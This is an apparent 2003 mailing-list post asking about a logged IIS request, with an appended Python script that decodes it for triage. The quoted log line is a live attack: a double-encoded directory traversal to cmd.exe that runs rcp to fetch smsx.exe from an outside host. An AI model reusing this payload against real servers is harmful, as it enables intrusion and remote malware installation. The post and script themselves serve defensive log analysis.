Hi,

Has anyone seen a request like this in their logs?

205.247.193.56 - - [05/May/2003:11:59:52 -0300] "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."

I tried rcping smsx.exe off the remote site but no joy; is the .adm an obscure windows-specific port address or something? One of our windows guys said the smsx was "remote management software", but had no idea about the .adm...

On a side note, the response I got from energis (the 195.92.252.138 owner) had the following at the start:

PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG

Further down:

Please note that if one of our IP addresses looks up to a 'webcache' (as opposed to a modem) we have a *maximum* of 30 hours to trace the user responsible for the abuse.

So I guess this means that Energis users have a pretty good chance of abusing remote servers through Energis' web cache and getting away with it :-/

Cheers,
Steve
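Added example, not part of the original post: a Python triage sketch that decodes the logged request above for a defender reviewing such entries. It percent-decodes the path until it stops changing (`%255c` becomes `%5c`, then a backslash) and splits the `rcp` operand on the assumption that it follows the `host.user:file` form that Windows `rcp` documents for remote operands; the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Request string copied from the log line in the post (log prefix omitted).
SAMPLE = ("/scripts/..%255c..%255cwinnt/system32/cmd.exe"
          "?/c+rcp+-b+195.92.252.138.adm:smsx.exe+.")

def decode_fully(text, max_rounds=5):
    """Percent-decode until the text is stable; return (text, rounds used)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds

# Assumption: remote operands use the Windows rcp form host.user:file,
# so the last dot-separated label before ':' is a user name, not a port.
RCP_OPERAND = re.compile(r"^(?P<host>.+)\.(?P<user>[^.:]+):(?P<file>.+)$")

def analyse(request):
    """Return triage facts for one logged request path plus query string."""
    path, _, query = request.partition("?")
    decoded, rounds = decode_fully(path)
    normalised = decoded.replace("\\", "/").lower()
    finding = {
        "decode_rounds": rounds,          # 2 or more means nested encoding
        "decoded_path": decoded,
        "traversal": "../" in normalised,
        "shell": normalised.endswith(("/cmd.exe", "/command.com")),
        "command": None,
        "rcp": None,
    }
    args = decode_fully(query.replace("+", " "))[0].split()
    if args and args[0].lower() == "/c":
        finding["command"] = " ".join(args[1:])
        if len(args) > 1 and args[1].lower() == "rcp":
            for operand in args[2:]:
                match = RCP_OPERAND.match(operand)
                if match:
                    finding["rcp"] = match.groupdict()
                    break
    return finding

if __name__ == "__main__":
    for key, value in analyse(SAMPLE).items():
        print(f"{key}: {value}")
```

A `decode_rounds` value of 2 or more together with `traversal` and `shell` both true is the combination worth alerting on; a filter that decodes only once sees `..%5c` and misses the backslash.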
This archive was generated by hypermail 2b30 : Mon May 05 2003 - 17:10:27 PDT